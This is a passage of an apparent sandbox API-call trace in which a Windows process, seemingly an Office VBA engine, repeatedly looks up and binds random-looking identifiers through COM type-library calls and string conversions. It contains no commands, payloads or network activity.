lHashVal=0x10a4c8, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.227] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.227] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.227] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_moBB1A", lHashVal=0x10a4c8, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.227] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.227] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.227] IUnknown:Release (This=0x665ba50) returned 0xd [0069.227] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b11bde, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_moBB1A") returned 14 [0069.227] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_moBB1A", lHashVal=0x10a4c8, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x6d005f00720061, ppTypeComp=0x31004200000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x6d005f00720061, ppTypeComp=0x31004200000000, pDummy=0x0) returned 0x0 [0069.227] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3a62d4a | out: _Dst=0x144ec0) returned 0x0 [0069.227] ITypeComp:RemoteBind (in: This=0x665ba60, szName="JoQZQUw", lHashVal=0x10bc67, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.227] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62d72, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="JoQZQUw") returned 8 [0069.227] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="JoQZQUw", lHashVal=0x10bc67, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.227] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62d72, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="JoQZQUw") returned 8 [0069.227] ITypeComp:RemoteBind (in: This=0x665bd30, szName="JoQZQUw", lHashVal=0x10bc67, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.227] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="JoQZQUw") returned 0x10bc67 [0069.227] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="JoQZQUw" | out: _Dst="JoQZQUw") returned 0x0 [0069.227] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="JoQZQUw") returned 8 [0069.227] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.227] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="JoQZQUw", lHashVal=0x10bc67, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.227] IUnknown:Release (This=0x665ba50) returned 0xd [0069.227] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.227] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="JoQZQUw", lHashVal=0x10bc67, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.228] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.228] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.228] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="JoQZQUw", lHashVal=0x10bc67, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.228] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.228] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.228] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="JoQZQUw", lHashVal=0x10bc67, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.228] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.228] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62d72, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="JoQZQUw") returned 8 [0069.228] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="JoQZQUw", lHashVal=0x10bc67, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.228] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0069.228] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3a62d72 | out: _Dst=0x67c2d40) returned 0x0 [0069.228] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_JoQZQUw") returned 0x10bfeb [0069.228] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_JoQZQUw" | out: _Dst="_B_var_JoQZQUw") returned 0x0 [0069.228] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_JoQZQUw") returned 15 [0069.228] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.228] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_JoQZQUw", lHashVal=0x10bfeb, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.228] IUnknown:Release (This=0x665ba50) returned 0xd [0069.228] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.228] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_JoQZQUw", lHashVal=0x10bfeb, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.228] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.228] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.228] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_JoQZQUw", lHashVal=0x10bfeb, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.228] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.228] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.228] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_JoQZQUw", lHashVal=0x10bfeb, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.228] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.228] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.228] IUnknown:Release (This=0x665ba50) returned 0xd [0069.228] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b11c0e, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_JoQZQUw") returned 15 [0069.229] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_JoQZQUw", lHashVal=0x10bfeb, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x4a005f00720061, ppTypeComp=0x51005a00000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x4a005f00720061, ppTypeComp=0x51005a00000000, pDummy=0x0) returned 0x0 [0069.229] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3a62d72 | out: _Dst=0x144ec0) returned 0x0 [0069.229] ITypeComp:RemoteBind (in: This=0x665ba60, szName="kADXADco", lHashVal=0x10ec5d, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.229] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62dc2, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="kADXADco") returned 9 [0069.229] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="kADXADco", lHashVal=0x10ec5d, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.229] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62dc2, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="kADXADco") returned 9 [0069.229] ITypeComp:RemoteBind (in: This=0x665bd30, szName="kADXADco", lHashVal=0x10ec5d, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.229] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="kADXADco") returned 0x10ec5d [0069.229] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="kADXADco" | out: _Dst="kADXADco") returned 0x0 [0069.229] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="kADXADco") returned 9 [0069.229] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.229] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="kADXADco", lHashVal=0x10ec5d, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.229] IUnknown:Release (This=0x665ba50) returned 0xd [0069.229] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.229] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="kADXADco", lHashVal=0x10ec5d, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.229] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.229] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.229] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="kADXADco", lHashVal=0x10ec5d, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.229] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.229] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.229] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="kADXADco", lHashVal=0x10ec5d, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.229] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.229] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62dc2, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="kADXADco") returned 9 [0069.230] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="kADXADco", lHashVal=0x10ec5d, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.230] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d40 [0069.230] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x9, _Src=0x3a62dc2 | out: _Dst=0x67c2d40) returned 0x0 [0069.230] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_kADXADco") returned 0x10c3e6 [0069.230] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_kADXADco" | out: _Dst="_B_var_kADXADco") returned 0x0 [0069.230] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_kADXADco") returned 16 [0069.230] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.230] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_kADXADco", lHashVal=0x10c3e6, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.230] IUnknown:Release (This=0x665ba50) returned 0xd [0069.230] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.230] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_kADXADco", lHashVal=0x10c3e6, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.230] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.230] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.230] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_kADXADco", lHashVal=0x10c3e6, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.230] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.230] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.230] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_kADXADco", lHashVal=0x10c3e6, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.230] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.230] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.230] IUnknown:Release (This=0x665ba50) returned 0xd [0069.230] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b11c3e, cbMultiByte=16, lpWideCharStr=0x144d00, cchWideChar=17 | out: lpWideCharStr="_B_var_kADXADco") returned 16 [0069.230] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_kADXADco", lHashVal=0x10c3e6, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x6b005f00720061, ppTypeComp=0x41005800000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x6b005f00720061, ppTypeComp=0x41005800000000, pDummy=0x0) returned 0x0 [0069.230] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3a62dc2 | out: _Dst=0x144ec0) returned 0x0 [0069.230] ITypeComp:RemoteBind (in: This=0x665ba60, szName="KAABDZA", lHashVal=0x10dabe, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.231] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62d9a, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="KAABDZA") returned 8 [0069.231] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="KAABDZA", lHashVal=0x10dabe, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.231] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62d9a, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="KAABDZA") returned 8 [0069.231] ITypeComp:RemoteBind (in: This=0x665bd30, szName="KAABDZA", lHashVal=0x10dabe, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.231] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="KAABDZA") returned 0x10dabe [0069.231] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="KAABDZA" | out: _Dst="KAABDZA") returned 0x0 [0069.231] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="KAABDZA") returned 8 [0069.231] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.231] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="KAABDZA", lHashVal=0x10dabe, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.231] IUnknown:Release (This=0x665ba50) returned 0xd [0069.231] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.231] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="KAABDZA", lHashVal=0x10dabe, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.231] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.231] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.231] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="KAABDZA", lHashVal=0x10dabe, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.231] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.231] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.231] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="KAABDZA", lHashVal=0x10dabe, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.231] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.231] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62d9a, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="KAABDZA") returned 8 [0069.231] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="KAABDZA", lHashVal=0x10dabe, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.231] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0069.231] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3a62d9a | out: _Dst=0x67c2d40) returned 0x0 [0069.231] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_KAABDZA") returned 0x10cec1 [0069.231] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_KAABDZA" | out: _Dst="_B_var_KAABDZA") returned 0x0 [0069.232] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_KAABDZA") returned 15 [0069.232] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.232] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_KAABDZA", lHashVal=0x10cec1, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.232] IUnknown:Release (This=0x665ba50) returned 0xd [0069.232] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.232] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_KAABDZA", lHashVal=0x10cec1, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.232] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.232] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.232] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_KAABDZA", lHashVal=0x10cec1, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.232] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.232] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.232] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_KAABDZA", lHashVal=0x10cec1, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.232] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.232] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.232] IUnknown:Release (This=0x665ba50) returned 0xd [0069.232] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b11c6e, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_KAABDZA") returned 15 [0069.232] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_KAABDZA", lHashVal=0x10cec1, wFlags=0x5, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x4b005f00720061, ppTypeComp=0x44004200000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x4b005f00720061, ppTypeComp=0x44004200000000, pDummy=0x0) returned 0x0 [0069.232] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3a62d9a | out: _Dst=0x144ec0) returned 0x0 [0069.232] ITypeComp:RemoteBind (in: This=0x665ba60, szName="ZoAAcUZw", lHashVal=0x10cdc1, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.232] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62e1a, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="ZoAAcUZw") returned 9 [0069.232] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="ZoAAcUZw", lHashVal=0x10cdc1, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.232] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62e1a, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="ZoAAcUZw") returned 9 [0069.232] ITypeComp:RemoteBind (in: This=0x665bd30, szName="ZoAAcUZw", lHashVal=0x10cdc1, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.233] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ZoAAcUZw") returned 0x10cdc1 [0069.233] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="ZoAAcUZw" | out: _Dst="ZoAAcUZw") returned 0x0 [0069.233] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="ZoAAcUZw") returned 9 [0069.233] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.233] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="ZoAAcUZw", lHashVal=0x10cdc1, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.233] IUnknown:Release (This=0x665ba50) returned 0xd [0069.233] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.233] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="ZoAAcUZw", lHashVal=0x10cdc1, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.233] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.233] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.233] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="ZoAAcUZw", lHashVal=0x10cdc1, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.233] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.233] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.233] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="ZoAAcUZw", lHashVal=0x10cdc1, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.233] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.233] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62e1a, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="ZoAAcUZw") returned 9 [0069.233] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="ZoAAcUZw", lHashVal=0x10cdc1, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, 